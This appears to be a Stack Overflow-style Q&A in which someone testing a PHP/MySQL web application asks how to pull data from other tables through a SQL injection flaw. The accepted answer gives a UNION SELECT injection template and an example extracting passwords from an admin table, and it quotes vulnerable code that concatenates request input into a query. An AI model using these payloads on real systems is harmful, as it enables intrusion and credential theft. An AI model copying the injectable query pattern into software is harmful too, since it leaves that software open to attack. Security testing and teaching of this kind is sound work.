# Override column value in WHERE clause?

Tags: mysql, sql, security

I was wondering if it was possible to override column value in the Where clause of a SQL query (MySQL in my case).

To be more clear, here is an example :

Suppose a basic query is :

```
SELECT lastname, firstname FROM contacts WHERE lastname = "Doe";
```

Is it possible to force `lastname` and `firstname` to return value from an other table, just by modifying what is after the WHERE part ? Something like

```
SELECT lastname, firstname FROM contacts WHERE lastname = (SELECT name FROM companies);
```

I am currently testing a web application, and I found a SQL Injection flaw where I can change `Doe` to whatever I want, but I'm limited with only one query ([mysql_query restriction of PHP](http://php.net/mysql_query)) and `addslashes` (so no " and ').

Comment: What happens when you execute this query? (You may want to "select top 1")

Answer (score 5, accepted):

possible could be

```
SELECT lastname, firstname FROM contacts WHERE lastname = "{0}" UNION SELECT {1} --
```

where {0} non existed value and {1} data from other tables

**UPDATE from wiki example**

```
$res = mysql_query("SELECT author FROM news WHERE id=" . $_REQUEST['id'] ." AND author LIKE ('a%')");
```

become

```
SELECT author FROM news WHERE id=-1 UNION SELECT password FROM admin/* AND author LIKE ('a%')
```

Answer (score 0):

The syntax that you used in your `SELECT ... WHERE` clause is a standard SQL feature called a subquery.

In the context of your example there is a restriction on the subquery to return just single value. Otherwise your query is a valid SQL and you can change subquery to return multiple values (with implicit OR) using `IN` operator like this:

```
SELECT lastname, firstname FROM contacts 
 WHERE lastname IN (
                    SELECT name FROM companies
                   );
```

You can [dig deeper](http://beginner-sql-tutorial.com/sql-subquery.htm) into this subject to uncover correlated subquery.

Comment: I'm not sure you understood what I asked (or I maybe didn't asked clearly enough :)), I want to list all the name from `companies` into lastname, not cross the result between contacts and companies.